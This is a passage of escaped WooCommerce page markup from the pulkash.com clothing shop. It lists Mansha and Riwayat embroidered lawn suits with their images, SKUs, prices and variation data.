600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":588,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-07","variation_description":"","variation_id":615,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-616 status-publish last instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-8\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-34.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen27.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen27.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen27.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-8\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"616\" data-product_sku=\"MAN-CH1-08\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-8\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-8\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"616\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"mintgreen 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":592,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-08","variation_description":"","variation_id":617,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mintgreen-34.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-618 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"618\" data-product_sku=\"MAN-CH1-09\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"618\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"brownpink 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":584,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-09","variation_description":"","variation_id":619,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-620 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"620\" data-product_sku=\"MAN-CH1-10\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-10\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"620\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"red 25.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":594,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-10","variation_description":"","variation_id":621,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/red-25.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-648 status-publish instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-30.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink--400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"648\" data-product_sku=\"RIW-CH2-01\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"648\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"brownpink 30.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":683,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"RIW-CH2-01","variation_description":"","variation_id":649,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-30.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-688 status-publish last instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"688\" data-product_sku=\"RIW-CH2-02\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"688\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"mint-grenn-30.99-600x900_4_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":953,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":11,"min_qty":1,"price_html":"","sku":"RIW-CH2-02","variation_description":"","variation_id":689,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" 